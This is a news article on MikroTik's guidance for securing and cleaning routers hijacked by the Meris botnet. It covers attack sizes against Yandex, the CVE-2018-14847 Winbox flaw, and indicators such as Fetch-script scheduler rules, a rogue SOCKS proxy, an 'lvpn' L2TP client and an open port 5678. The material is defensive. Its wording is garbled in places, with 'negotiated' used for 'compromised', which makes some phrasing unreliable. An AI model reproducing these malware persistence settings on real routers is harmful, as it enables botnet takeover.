MikroTik Shares Information on Protecting Routers Hit by Massive Meris Botnet

MikroTik Shares Information on Protecting Routers Hit by Massive Meris Botnet

The Latvian network tool manufacturer MikroTik has transmitted the information on how customers can protect and clean routers negotiated by the massive Meris DDoS botnet over the summer. As far as we have seen, these threat actors utilize the same routers that were negotiated in 2018, when MikroTik RouterOS had a vulnerability, that was quick,” a MicroTik spokesperson told our experts.

“Unfortunately, concluding the vulnerability does not urgently secure these routers. If somebody got your credentials in 2018, just an upgrade will not help. “You must also change the credentials, re-check your firewall if it does not permit remote access to unknown parties, and look for scripts that you did not create.”

IoT Botnet on Steroids

The Meris Botnet has been behind two record-breaking volumetric also known as application-layer DDoS attacks this year. The first one mitigated by Cloudflare in August reached 17.2 million request-per-second (RPS). The second one peaked at an unprecedented rate of 21.8 million RPS while hammering Russian internet giant Yandex servers earlier this month.

MikroTik-Shares-Information-on-Protecting-Routers-Hit-by-Massive-Meris-Botnet-image1

As per our experts who facilitated detail on the Yandex attack, Meris – a botnet derived from Mirai malware code – is now handling roughly 250,000 devices connected to the Internet through the Ethernet connection.

The history of Meris’s attacks targeting Yandex’s network started in early August with a 5.2 million RPS DDoS attack and kept increasing in size:

  • 2021-08-07 – 5.2 million RPS
  • 2021-08-09 – 6.5 million RPS
  • 2021-08-29 – 9.6 million RPS
  • 2021-08-31 – 10.9 million RPS
  • 2021-09-05 – 21.8 million RPS

How to Protect and Clean your MikroTik Router?

MikroTik also shared info on how to clean and secure gateways compromised by this botnet in a blog post published in recent days.

The network equipment vendor urges customers to choose strong passwords that should defend their devices from brute-force attacks and keep them up to date to block CVE-2018-14847 Winbox exploits likely used by the Mēris botnet according to MikroTik.

The company outlined the best course of action, which includes the following steps:

  • Keep your MikroTik device up to date with regular upgrades.
  • Do not open access to your device from the internet site to everyone, if you need remote access, only open a secure VPN service, like IPsec.
  • Use a strong password and even if you do, change it now!
  • Don’t assume your local network can be trusted. Malware can attempt to connect to your router if you have a weak password or no password.
  • Inspect your RouterOS configuration for unknown settings.
  • Settings the Mēris malware can set when reconfiguring compromised MicroTik routers include:
  • System -> Scheduler rules that execute a Fetch script. Remove these.
  • IP -> Socks proxy. If you don’t use this feature or don’t know what it does, it must be disabled.
  • L2TP client named “lvpn” or any L2TP client that you don’t recognize.
  • Input firewall rule that allows access for port 5678.

“We have tried to connect with all users of RouterOS about this, but almost of them have never been in contact with MikroTik and are not actively monitoring their devices. We are working on other solutions too,” MikroTik added.

“As far as we know right now – There are no new vulnerabilities in these devices. RouterOS has been recently individually audited by several contractors.”

Leave a Reply